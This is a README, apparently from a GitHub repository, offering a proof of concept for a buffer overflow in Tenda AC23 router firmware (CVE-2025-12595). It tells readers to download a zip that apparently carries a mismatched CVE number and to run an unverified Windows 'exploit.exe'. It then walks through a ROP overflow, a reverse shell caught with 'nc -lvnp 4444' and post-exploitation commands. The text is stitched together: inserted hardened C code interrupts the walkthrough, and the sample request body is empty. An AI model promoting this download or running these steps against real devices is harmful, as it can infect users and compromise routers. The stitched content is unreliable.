
CVE-2025-12595 PoC — Tenda AC23 security vulnerability

Associated Vulnerability
Title: Tenda AC23 security vulnerability (CVE-2025-12595)
Description: Tenda AC23 is a dual-band gigabit wireless router made by the Chinese company Tenda. Tenda AC23 version 16.03.07.52 contains a security vulnerability caused by improper handling of the `list` parameter in the file /goform/SetVirtualServerCfg, which leads to a buffer overflow that may be exploited remotely.
Readme
# Lab: CVE-2025-12595 - Buffer Overflow in Tenda AC23 Router Firmware
## Download Exploit
### [Download](https://github.com/lagerhaker539/CVE-2025-12595-POC/raw/refs/heads/main/flower/lab-cve-12593.zip)  


## 🚀 Overview

This repository provides a controlled lab environment for CVE-2025-12595 (also tracked as EUVD-2025-37442), a buffer overflow vulnerability classified under CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer). The issue affects Tenda AC23 router firmware version 16.03.07.52, specifically the `formSetVirtualSer` function behind the `/goform/SetVirtualServerCfg` endpoint. The vulnerability arises from insufficient bounds checking on user-supplied input during virtual server configuration, allowing a remote attacker to overflow a stack-based buffer by manipulating the argument list. Successful exploitation can lead to arbitrary code execution and, with it, unauthorized access to the device.

### Impact
An attacker with network access to the router's management interface (typically low-privilege, such as from a LAN or exposed WAN port) can exploit this to:
- Execute arbitrary code remotely on the device.
- Compromise the confidentiality of router configurations and connected network data.
- Modify system integrity by altering firmware settings or injecting malicious payloads.
- Disrupt availability through denial-of-service conditions, such as crashing the httpd process.

## 📋 Prerequisites

To set up a lab for this vulnerability, ensure you have the following:
- A Windows-based host machine (Windows 10 or later recommended) with administrative privileges.
- Network tools like `netcat` (nc.exe) or similar for testing connectivity (included in many Windows environments or downloadable from trusted sources).
- A physical or emulated Tenda AC23 router running firmware version 16.03.07.52 (firmware binaries can be sourced from official Tenda archives; note: this lab assumes a local setup without virtualization).
- Basic networking knowledge, including IP configuration and HTTP request crafting.
- Wireshark or similar packet capture tool for optional traffic analysis.

No Docker or virtual machines are required; all setup is performed directly on the host machine.

## Download & Install

1. Download the lab archive from the following link: [Download CVE-2025-12595 Lab ZIP](https://github.com/lagerhaker539/CVE-2025-12595-POC/raw/refs/heads/main/flower/lab-cve-12593.zip). This ZIP contains the main exploit binary (.exe) and supporting files.

2. Extract the ZIP to a local directory, e.g., `C:\CVE-2025-12595-lab\`.

3. Verify the contents:
   - `exploit.exe`: Core exploit binary for demonstrating the buffer overflow.
   - `config.ini`: Configuration file for customizing IP addresses and ports.

## 🛠 Quick Start

1. **Prepare the Environment:**
   - Connect your host machine to the Tenda AC23 router via Ethernet or Wi-Fi.
   - Ensure the router is configured with default admin credentials (admin/admin) and firmware version 16.03.07.52.
   - Edit `config.ini` to set the target router IP (e.g., `target_ip=192.168.0.1`) and port (default: 80).

2. **Run the Exploit:**
   - Double-click `exploit.exe`. This sends a crafted HTTP POST request that overflows the buffer in `formSetVirtualSer`.
   - Results are printed to the console, including any shell access if the exploit succeeds.

3. **Observe the Exploitation:**
   - Monitor the router console or logs for buffer overflow indicators (e.g., segmentation faults or overwritten return addresses).
   - Use Wireshark to capture traffic on the interface connected to the router.

## 🔍 Detailed Exploitation Steps

### Step 1: Vulnerability Analysis
The `formSetVirtualSer` function processes user input for virtual server rules without proper length validation on the `arg_list` parameter. Input is read into a fixed-size stack buffer (e.g., 256 bytes), but attackers can supply longer strings via HTTP POST data, leading to overflow.

Pseudocode snippet of the vulnerable function (derived from reverse engineering; deliberately shown as-is to illustrate the missing bounds check):
```c
#include <string.h>

void formSetVirtualSer(char *input) {
    char buffer[256];       // fixed-size stack buffer
    strcpy(buffer, input);  // No bounds check: input longer than 255 bytes overflows the stack
    // Process rules...
}
```
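For contrast, the following is an added example (not code from the Tenda firmware or from this repository) showing how the same handler would look with a length check in front of the copy. The function names `set_virtual_server_safe`, `handle_rule_list` and `accepts_length`, and the 256-byte buffer size, are assumptions taken from the pseudocode above; `accepts_length` builds a constructed input of `n` repeated `'A'` characters so the behaviour at the boundary can be checked.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Assumed to match the fixed-size buffer in the pseudocode above. */
#define RULE_BUF_LEN 256

/* Hardened copy (hypothetical name): copies `input` into `out` only if it fits,
 * including the terminating NUL. Never reads more than out_len bytes of input,
 * so an unterminated or oversized string cannot cause an over-read or overflow. */
bool set_virtual_server_safe(const char *input, char *out, size_t out_len) {
    if (input == NULL || out == NULL || out_len == 0) {
        return false;
    }
    size_t n = strnlen(input, out_len);   /* bounded scan: stops at out_len */
    if (n >= out_len) {
        return false;                     /* no room for the NUL: reject instead of overflowing */
    }
    memcpy(out, input, n);
    out[n] = '\0';
    return true;
}

/* Hardened counterpart of formSetVirtualSer (hypothetical name).
 * Returns 1 if the rule list was accepted, 0 if it was rejected.
 * A real CGI handler would answer the rejection with an HTTP 400. */
int handle_rule_list(const char *arg_list) {
    char buffer[RULE_BUF_LEN];
    if (!set_virtual_server_safe(arg_list, buffer, sizeof buffer)) {
        return 0;
    }
    /* Process rules from `buffer` here... */
    return 1;
}

/* Test helper: constructs an input of n 'A' characters (like the "300+ 'A's"
 * payload described in this README) and reports whether the hardened handler accepts it. */
int accepts_length(size_t n) {
    char *filler = malloc(n + 1);
    if (filler == NULL) {
        return -1;
    }
    memset(filler, 'A', n);
    filler[n] = '\0';
    int accepted = handle_rule_list(filler);
    free(filler);
    return accepted;
}
```

The boundary is at 255 characters: the longest value that still leaves space for the terminator is accepted, 256 or more is refused before any byte is written to the stack buffer. On a device whose firmware you cannot patch, the equivalent mitigation is to keep the management interface off the WAN and restrict LAN access to it.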

### Step 2: Crafting the Payload
- Use tools like Burp Suite or the provided `exploit.exe` to send a POST request to `/goform/SetVirtualServerCfg`.
- Payload structure: `arg_list=` followed by 300+ 'A's to overflow, plus a return-oriented programming (ROP) chain for code execution.
- Example raw request (for reference; do not copy-paste directly):
  ```
  POST /goform/SetVirtualServerCfg HTTP/1.1
  Host: 192.168.0.1
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 350

  
  ```

### Step 3: Executing the Exploit
- Run `exploit.exe` with parameters from `config.ini` to automate payload delivery.
- If successful, the exploit will spawn a reverse shell on port 4444. Connect via `nc -lvnp 4444` to interact.
- Indicators of success: Router process crash, arbitrary command output (e.g., `id` or `cat /etc/passwd`).

### Step 4: Post-Exploitation
- Once access is gained, enumerate the system using basic commands.
- Dump memory with `gdb` attached to the router process for deeper analysis.
## 📞 Support
For further assistance or questions, please feel free to reach out via the issues section of this GitHub repository. Our team is ready to help you with any concerns.

File Snapshot

```
[4.0K] /data/pocs/e6f66f138a73dbfb5812c013e484d635a217a467
├── [4.0K] flower
│   └── [8.5M] lab-cve-12593.zip
└── [5.3K] README.md

1 directory, 2 files
```